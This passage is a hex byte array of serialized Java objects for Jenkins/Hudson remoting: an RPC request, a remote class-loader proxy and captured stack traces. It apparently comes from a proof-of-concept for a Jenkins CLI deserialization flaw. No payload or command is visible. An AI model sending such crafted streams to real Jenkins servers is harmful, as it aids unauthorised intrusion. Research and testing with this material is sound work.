0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x00,0x00,0x00,\n 0x43,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x74,0x00,0x0c,0x43,0x6f,0x6d,0x6d,0x61,\n 0x6e,0x64,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x3c,0x69,0x6e,0x69,0x74,0x3e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x32,0x71,0x00,0x7e,0x00,0x15,0x71,0x00,0x7e,0x00,\n 0x16,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x63,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,\n 0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x0c,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,\n 0x00,0x3c,0x74,0x00,0x1b,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x55,0x73,0x65,0x72,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x10,\n 0x55,0x73,0x65,0x72,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x03,0x08,0x74,0x00,0x17,0x68,\n 0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x74,0x00,0x0c,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x2e,0x6a,0x61,\n 0x76,0x61,0x74,0x00,0x04,0x63,0x61,0x6c,0x6c,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0xfa,0x74,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x74,0x00,0x1c,0x52,0x65,0x6d,0x6f,0x74,0x65,\n 0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x73,0x71,0x00,0x7e,\n 0x00,0x13,0xff,0xff,0xff,0xff,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x24,0x50,0x72,0x6f,0x78,0x79,0x31,0x70,0x74,0x00,\n 0x0f,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,\n 0x21,0x74,0x00,0x15,0x77,0x61,0x69,0x74,0x46,0x6f,0x72,0x52,0x65,0x6d,0x6f,0x74,0x65,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,\n 0x74,0x00,0x0e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x74,0x00,0x08,0x43,0x4c,0x49,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,\n 0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,0x74,0x00,0x1f,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,\n 0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x19,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x2e,0x6a,0x61,0x76,0x61,\n 0x74,0x00,0x07,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x74,0x00,0x05,0x5f,0x6d,\n 0x61,0x69,0x6e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,\n 0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x4c,0x69,\n 0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,0x8e,0x10,0x02,0x00,0x01,0x4c,0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x0f,0x78,0x72,0x00,0x2c,0x6a,0x61,0x76,0x61,0x2e,0x75,\n 0x74,0x69,0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n 0x69,0x6f,0x6e,0x19,0x42,0x00,0x80,0xcb,0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,\n 0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x3b,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,0x73,0x74,0x78,0x81,\n 0xd2,0x1d,0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x78,0x70,0x00,0x00,0x00,0x00,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x71,0x00,0x7e,0x00,0x3c,0x78,\n 0x71,0x00,0x7e,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x70,0x73,0x7d,0x00,0x00,0x00,0x02,0x00,0x2e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,\n 0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x00,0x1c,\n 0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x49,0x52,0x65,0x61,0x64,0x52,0x65,0x73,0x6f,0x6c,0x76,0x65,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,\n 0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,0x01,0x68,\n 0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,\n 0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,\n 0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,0x00,0x05,0x5a,0x00,0x14,0x61,0x75,0x74,0x6f,0x55,0x6e,\n 0x65,0x78,0x70,0x6f,0x72,0x74,0x42,0x79,0x43,0x61,0x6c,0x6c,0x65,0x72,0x5a,0x00,0x09,0x67,0x6f,0x69,0x6e,0x67,0x48,0x6f,0x6d,0x65,0x49,0x00,0x03,0x6f,0x69,0x64,0x5a,0x00,0x09,\n 0x75,0x73,0x65,0x72,0x50,0x72,0x6f,0x78,0x79,0x4c,0x00,0x06,0x6f,0x72,0x69,0x67,0x69,0x6e,0x71,0x00,0x7e,0x00,0x0d,0x78,0x70,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x73,0x71,0x00,\n 0x7e,0x00,0x0b,0x71,0x00,0x7e,0x00,0x43,0x74,0x00,0x78,0x50,0x72,0x6f,0x78,0x79,0x20,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,\n 0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x40,0x32,0x20,0x77,0x61,0x73,0x20,0x63,0x72,0x65,0x61,0x74,0x65,0x64,\n 0x20,0x66,0x6f,0x72,0x20,0x69,0x6e,0x74,0x65,0x72,0x66,0x61,0x63,0x65,0x20,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,\n 0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x75,0x71,0x00,0x7e,0x00,0x11,0x00,0x00,0x00,\n 0x0d,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x7d,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,\n 0x89,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x74,0x00,0x04,0x77,0x72,0x61,0x70,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0x6a,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,\n 0x7e,0x00,0x21,0x74,0x00,0x06,0x65,0x78,0x70,0x6f,0x72,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0xa6,0x74,0x00,0x21,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,\n 0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x74,0x00,0x16,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,\n 0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x4a,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x46,0x71,0x00,0x7e,0x00,0x1d,0x71,0x00,\n 0x7e,0x00,0x1e,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x03,0x08,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,0x21,0x71,0x00,0x7e,0x00,0x22,0x73,0x71,\n 0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0xfa,0x71,0x00,0x7e,0x00,0x24,0x71,0x00,0x7e,0x00,0x25,0x71,0x00,0x7e,0x00,0x26,0x73,0x71,0x00,0x7e,0x00,0x13,0xff,0xff,0xff,0xff,0x71,0x00,\n 0x7e,0x00,0x28,0x70,0x71,0x00,0x7e,0x00,0x29,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x71,0x00,0x7e,0x00,0x20,0x71,0x00,0x7e,0x00,0x21,0x71,0x00,0x7e,0x00,0x2b,0x73,\n 0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,0x71,\n 0x00,0x7e,0x00,0x30,0x71,0x00,0x7e,0x00,0x31,0x71,0x00,0x7e,0x00,0x32,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,\n 0x00,0x7e,0x00,0x34,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2d,0x71,0x00,0x7e,0x00,0x2e,0x71,0x00,0x7e,0x00,0x36,0x71,0x00,0x7e,0x00,0x3a,0x78,\n 0x78,0x75,0x72,0x00,0x02,0x5b,0x42,0xac,0xf3,0x17,0xf8,0x06,0x08,0x54,0xe0,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x07,0x46,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x68,0x75,0x64,\n 0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,\n 0x72,0x24,0x52,0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x04,0x49,0x00,0x03,0x6f,0x69,0x64,0x5b,0x00,0x09,0x61,0x72,0x67,\n 0x75,0x6d,0x65,0x6e,0x74,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,\n 0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x05,0x74,0x79,0x70,0x65,0x73,\n 0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x77,0x08,0xff,0xff,0xff,0xfe,0x00,0x00,0x00,0x02,0x78,0x72,0x00,\n 0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,\n 0x49,0x00,0x02,0x69,0x64,0x49,0x00,0x08,0x6c,0x61,0x73,0x74,0x49,0x6f,0x49,0x64,0x4c,0x00,0x08,0x72,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x74,0x00,0x1a,0x4c,0x68,0x75,0x64,0x73,\n 0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x73,0x70,0x6f,0x6e,0x73,0x65,0x3b,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x72,0x00,0x17,0x68,0x75,0x64,0x73,\n 0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x09,0x63,0x72,\n 0x65,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x3b,0x77,0x04,0x00,0x00,\n 0x00,0x00,0x78,0x70,0x73,0x72,0x00,0x1e,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x24,0x53,0x6f,0x75,\n 0x72,0x63,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x01,0x4c,0x00,0x06,0x74,0x68,0x69,0x73,0x24,0x30,0x74,0x00,0x19,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,\n 0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x3b,0x77,0x04,0x00,0x00,0x00,0x00,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n 0x2e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xd0,0xfd,0x1f,0x3e,0x1a,0x3b,0x1c,0xc4,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,\n 0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0xd5,0xc6,0x35,0x27,0x39,0x77,0xb8,0xcb,0x03,0x00,0x04,0x4c,0x00,0x05,0x63,0x61,0x75,0x73,0x65,0x74,\n 0x00,0x15,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x54,0x68,0x72,0x6f,0x77,0x61,0x62,0x6c,0x65,0x3b,0x4c,0x00,0x0d,0x64,0x65,0x74,0x61,0x69,0x6c,0x4d,0x65,0x73,\n 0x73,0x61,0x67,0x65,0x71,0x00,0x7e,0x00,0x02,0x5b,0x00,0x0a,0x73,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x74,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n 0x67,0x2f,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x4c,0x00,0x14,0x73,0x75,0x70,0x70,0x72,0x65,0x73,0x73,0x65,0x64,0x45,0x78,\n 0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x73,0x74,0x00,0x10,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x4c,0x69,0x73,0x74,0x3b,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,\n 0x71,0x00,0x7e,0x00,0x10,0x70,0x75,0x72,0x00,0x1e,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,\n 0x6d,0x65,0x6e,0x74,0x3b,0x02,0x46,0x2a,0x3c,0x3c,0xfd,0x22,0x39,0x02,0x00,0x00,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x0b,0x73,0x72,0x00,0x1b,0x6a,0x61,0x76,\n 0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x61,0x63,0x6b,0x54,0x72,0x61,0x63,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x61,0x09,0xc5,0x9a,0x26,0x36,0xdd,0x85,0x02,0x00,0x04,\n 0x49,0x00,0x0a,0x6c,0x69,0x6e,0x65,0x4e,0x75,0x6d,0x62,0x65,0x72,0x4c,0x00,0x0e,0x64,0x65,0x63,0x6c,0x61,0x72,0x69,0x6e,0x67,0x43,0x6c,0x61,0x73,0x73,0x71,0x00,0x7e,0x00,0x02,\n 0x4c,0x00,0x08,0x66,0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x02,0x4c,0x00,0x0a,0x6d,0x65,0x74,0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x71,0x00,0x7e,0x00,0x02,0x77,\n 0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x43,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x6f,0x6d,0x6d,0x61,\n 0x6e,0x64,0x74,0x00,0x0c,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x06,0x3c,0x69,0x6e,0x69,0x74,0x3e,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,\n 0x32,0x71,0x00,0x7e,0x00,0x15,0x71,0x00,0x7e,0x00,0x16,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x63,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,\n 0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x0c,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,\n 0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x02,0x39,0x74,0x00,0x32,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,\n 0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x24,0x52,0x50,0x43,0x52,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x1c,0x52,0x65,\n 0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,\n 0x00,0x13,0x00,0x00,0x00,0xf6,0x74,0x00,0x27,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x52,0x65,0x6d,0x6f,0x74,0x65,0x49,0x6e,0x76,0x6f,\n 0x63,0x61,0x74,0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x71,0x00,0x7e,0x00,0x1e,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x73,0x71,0x00,0x7e,0x00,0x13,0xff,0xff,\n 0xff,0xff,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x24,0x50,0x72,0x6f,0x78,0x79,0x31,0x70,0x74,0x00,0x0f,0x77,0x61,0x69,\n 0x74,0x46,0x6f,0x72,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x04,0xe7,0x74,0x00,0x17,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,\n 0x6f,0x74,0x69,0x6e,0x67,0x2e,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x74,0x00,0x0c,0x43,0x68,0x61,0x6e,0x6e,0x65,0x6c,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x15,0x77,0x61,0x69,0x74,\n 0x46,0x6f,0x72,0x52,0x65,0x6d,0x6f,0x74,0x65,0x50,0x72,0x6f,0x70,0x65,0x72,0x74,0x79,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x93,0x74,0x00,0x0e,0x68,0x75,0x64,0x73,0x6f,\n 0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x74,0x00,0x08,0x43,0x4c,0x49,0x2e,0x6a,0x61,0x76,0x61,0x71,0x00,0x7e,0x00,0x17,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x00,0x48,\n 0x74,0x00,0x1f,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x63,0x6c,0x69,0x2e,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x74,\n 0x00,0x19,0x43,0x4c,0x49,0x43,0x6f,0x6e,0x6e,0x65,0x63,0x74,0x69,0x6f,0x6e,0x46,0x61,0x63,0x74,0x6f,0x72,0x79,0x2e,0x6a,0x61,0x76,0x61,0x74,0x00,0x07,0x63,0x6f,0x6e,0x6e,0x65,\n 0x63,0x74,0x73,0x71,0x00,0x7e,0x00,0x13,0x00,0x00,0x01,0xdf,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x05,0x5f,0x6d,0x61,0x69,0x6e,0x73,0x71,0x00,0x7e,0x00,\n 0x13,0x00,0x00,0x01,0x86,0x71,0x00,0x7e,0x00,0x2a,0x71,0x00,0x7e,0x00,0x2b,0x74,0x00,0x04,0x6d,0x61,0x69,0x6e,0x73,0x72,0x00,0x26,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,\n 0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x4c,0x69,0x73,0x74,0xfc,0x0f,0x25,0x31,0xb5,0xec,\n 0x8e,0x10,0x02,0x00,0x01,0x4c,0x00,0x04,0x6c,0x69,0x73,0x74,0x71,0x00,0x7e,0x00,0x0f,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x72,0x00,0x2c,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,\n 0x6c,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x24,0x55,0x6e,0x6d,0x6f,0x64,0x69,0x66,0x69,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n 0x6e,0x19,0x42,0x00,0x80,0xcb,0x5e,0xf7,0x1e,0x02,0x00,0x01,0x4c,0x00,0x01,0x63,0x74,0x00,0x16,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,0x6c,0x2f,0x43,0x6f,0x6c,0x6c,0x65,\n 0x63,0x74,0x69,0x6f,0x6e,0x3b,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x73,0x72,0x00,0x13,0x6a,0x61,0x76,0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x41,0x72,0x72,0x61,0x79,0x4c,0x69,\n 0x73,0x74,0x78,0x81,0xd2,0x1d,0x99,0xc7,0x61,0x9d,0x03,0x00,0x01,0x49,0x00,0x04,0x73,0x69,0x7a,0x65,0x77,0x04,0xff,0xff,0xff,0xfd,0x78,0x70,0x00,0x00,0x00,0x00,0x77,0x04,0x00,\n 